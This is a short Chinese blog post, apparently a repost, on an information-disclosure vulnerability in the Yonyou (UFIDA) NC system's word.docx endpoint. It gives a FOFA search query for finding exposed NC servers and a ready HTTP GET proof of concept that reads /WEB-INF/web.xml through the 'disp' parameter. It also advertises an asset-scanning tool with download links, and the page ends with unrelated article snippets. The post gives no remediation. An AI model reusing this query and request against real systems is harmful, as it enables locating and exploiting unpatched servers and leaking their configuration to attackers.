首页 > 其他分享 >用友NC系统word.docx信息泄露漏洞复现学习

用友NC系统word.docx信息泄露漏洞复现学习

时间:2024-10-21 16:11:16浏览次数:1  
标签:xml docx word image NC 用友

用友NC系统word.docx存在信息泄露漏洞

用友NC系统word.docx存在信息泄露漏洞,disp=/WEB-INF/web.xml。其他的自己设置

fofa

app="用友-UFIDA-NC"

poc

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Cookie: JSESSIONID=722CE6F799BBDE1ED1AFA8DC032B06C0.ncServer; JSESSIONID=6BDD75C8E88EE19ED89FF84865C74059.ncServer
Host: 
If-Modified-Since: Mon, 07 Jan 2019 01:42:44 GMT
If-None-Match: W/"15737-1546825364907"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

私货:使用小工具geekcontroller快速扫描在网资产。
1、注册https://api.lmm233.com
2、同步POC
3、获取推荐资产
4、设置扫描选项
下载地址:https://www.lmm233.com "下载区"

标签:xml,docx,word,image,NC,用友
From: https://www.cnblogs.com/limanman233/p/18489683

相关文章

  • 无监督的神经网络模型——自动编码器(Autoencoder)解读
    采用自动编码器进行高效特征提取详解自动编码器(Autoencoder)是一种无监督的神经网络模型,广泛应用于数据降维、特征提取、数据压缩和去噪等领域。通过学习数据的有效编码,自动编码器能够将高维数据映射到低维隐含空间,同时保留尽可能多的原始信息。本文将深入探讨如何采用自动......
  • 【论文阅读笔记】An Image is Worth 1/2 Tokens After Layer 2: Plug-and-Play Infere
    论文地址:https://arxiv.org/pdf/2403.06764代码地址:https://github.com/pkunlp-icler/FastV目录IntroductionInefficientVisualAttentioninVLLMsPreliminaries两种分数结果分析FastVOverviewRe-rankandFilteringmodule(core)ThoughtIntroduction现象(问题):大多数LVL......
  • [Javascript] Write memoize function
    classMemoizeMap{constructor(){this._map=newMap();this._weakMap=newWeakMap();}_isObject(v){returntypeofv==="object"&&v!==null;}set(key,value){if(this._isObject(key)){this._......
  • 【进阶OpenCV】 (21) --卷积神经网络实现人脸检测
    文章目录卷积神经网络实现人脸检测一、加载CNN人脸检测模型二、图像预处理三、绘制人脸矩形框总结卷积神经网络实现人脸检测opencv可以直接通过readnet来读取神经网络。dlib也可以的。任务:使用dlib库中的卷积神经网络(CNN)人脸检测模型来检测一张图片中的人脸,并使用O......
  • 【从零开始学习VLSI设计(三)】超导器件特性仿真——约瑟夫森结(Josephsen Junction)与Josi
    系列文章目录从零开始学习VLSI设计(一)Yosys工具概述从零开始学习VLSI设计(二)Yosys工具进阶文章目录系列文章目录前言一、约瑟夫森效应二、等效电路-RCSJ模型三、使用Jisim仿真JJ特性1.编写网表描述文件2.使用jsim仿真JJ电压电流特性3.可视化数据四、使用Josim仿真JJ......
  • Codeforces Round 980 (Div. 2) C. Concatenation of Arrays
    题目:给定n个数组a1,a2,…,an。每个数组的长度都是2。因此,ai=[ai,1,ai,2]。你需要将这些数组连接成一个长度为2n的单一数组,以便使结果数组中的逆序数最小。注意,你不需要实际计算逆序的数量。更正式地说,你需要选择一个长度为n的排列p,使得数组b=[ap1,1,ap1,2,......
  • Python 自编码器(Autoencoder)算法详解与应用案例
    目录Python自编码器(Autoencoder)算法详解与应用案例引言一、自编码器的基本原理1.1自编码器的结构1.2自编码器的类型二、Python中自编码器的面向对象实现2.1`Autoencoder`类的实现2.2`Trainer`类的实现2.3`DataLoader`类的实现三、案例分析3.1手写数字去噪自......
  • PointWeb: Enhancing Local Neighborhood Features for Point Cloud Processing——点
    此内容是论文总结,重点看思路!!文章概要本文研究如何有效聚合局部特征,提高点云数据的识别性能,提出了一种新的处理点云的方法PointWeb,旨在从局部邻域中提取上下文特征。与之前的方法不同,PointWeb通过密集连接局部邻域中的每个点,从而基于该区域的特性来调整每个点的特征。主要创......
  • __arm_smmu_tlb_sync调用过程
    __arm_smmu_tlb_sync调用过程这个函数分别在两处地方被调用:arm_smmu_tlb_sync_global#defineARM_SMMU_GR0(smmu) ((smmu)->base)#defineARM_SMMU_GR0_sTLBGSYNC 0x70#defineARM_SMMU_GR0_sTLBGSTATUS 0x74staticvoidarm_smmu_tlb_sync_global(structarm_smmu_devi......
  • WordPress如何优雅地删除没有包含图片的文章
    作为一个在乎用户体验的 SEOer 来说,子凡我不太能够接受文章没有配图,不然就总感觉少了点东西,当然这也是对文章质量的一种提升,但是由于网站中可能会存在一些老旧的文章没有包含任何图片,导致内容显得单薄,影响用户体验。为了提高网站内容的整体质量,删除这些没有图片的文章是一个有效......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99